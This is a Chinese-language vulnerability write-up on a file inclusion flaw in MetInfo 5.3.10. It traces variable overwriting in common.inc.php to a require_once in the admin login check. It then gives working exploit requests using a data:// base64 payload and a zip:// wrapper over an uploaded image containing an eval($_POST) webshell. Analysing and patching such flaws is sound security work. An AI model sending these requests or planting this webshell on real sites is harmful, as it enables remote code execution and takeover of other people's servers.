Metinfo5.3.10文件包含分析

Metinfo5.3.10文件包含

漏洞成因

/admin/login/login_check.php

<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
if ($depth != '' && $depth != '../' && $depth != '../../') {die();}
if (!isset($depth)) {
	$depth = '';
}

$commonpath = $depth . 'include/common.inc.php';
$commonpath = $admin_index ? $commonpath : '../' . $commonpath;
define('SQL_DETECT', 1);
require_once $commonpath;
$turefile = $url_array[count($url_array) - 2];
if ($met_adminfile != $turefile && $adminmodify != 1) {
	$met_adminfile = $turefile;
	$turefile = authcode($turefile, 'ENCODE', $met_webkeys);
	$query = "update $met_config set value='$turefile' where name='met_adminfile' and lang='metinfo'";
	$db->query($query);
}
$login_name = daddslashes($login_name, 0, 1);
$metinfo_admin_name = daddslashes($metinfo_admin_name, 0, 1);
if ($action == "login") {
	$metinfo_admin_name = $login_name;
	$metinfo_admin_pass = $login_pass;
	$metinfo_admin_pass = md5($metinfo_admin_pass);
	/*code*/
	if ($met_login_code == 1) {
		require_once $depth . '../include/captcha.class.php';
    }

漏洞点就是:

	if ($met_login_code == 1) {
		require_once $depth . '../include/captcha.class.php';
    }

其中$depth的值是可以通过变量覆盖来给值的。

$commonpath = $depth . 'include/common.inc.php';
$commonpath = $admin_index ? $commonpath : '../' . $commonpath;
define('SQL_DETECT', 1);
require_once $commonpath;

包含的common.inc.php中有

foreach (array('_COOKIE', '_POST', '_GET') as $_request) {
	foreach ($$_request as $_key => $_value) {
		$_key{0} != '_' && $$_key = daddslashes($_value, 0, 0, 1);
		$_M['form'][$_key] = daddslashes($_value, 0, 0, 1);
	}
}

所以导致了可以包含文件

<?php
require_once $_GET[1].'../a.php';

类似如此。

攻击方式

有条件下的攻击(allow_url_include=on)

http://10.211.55.3/code-src/metinfo/web1/admin/login/login_check.php?langset=cn&depth=data://text/plain;base64,PD9waHAgcGhwaW5mbygpO2V4aXQoKTsvLw==

POST:
action=login&login_name=123&login_pass=123&code=&Submit=%E7%99%BB%E5%BD%95&met_login_code=1

其中要注意的是$met_login_code，因为默认是为0的，可以通过变量覆盖使其变为1

利用协议攻击

相比正常情况下，allow_url_include是off的，这样的情况下可以这样攻击。

zip:///tmp/1.jpg#../include/captcha.class.php

这样就能导致包含，其中1.jpg可以在member中上传。现在主要的是zip文件中的../include/captcha.class.php如何构造，主要是..的问题

创建目录结构为

aa/
	include/
			captcha.class.php

将aa的16进制改为2e，即为.
其中captcha.class.php内容：

<?php
var_dump('syc');
eval($_POST['lemon']);
exit();
?>

http://10.211.55.3/code-src/metinfo/web1/admin/login/login_check.php?langset=cn&depth=zip://C://WWW//code-src//metinfo//web1//upload//head//1.png%23

POST:
action=login&login_name=123&login_pass=123&code=&Submit=%E7%99%BB%E5%BD%95&met_login_code=1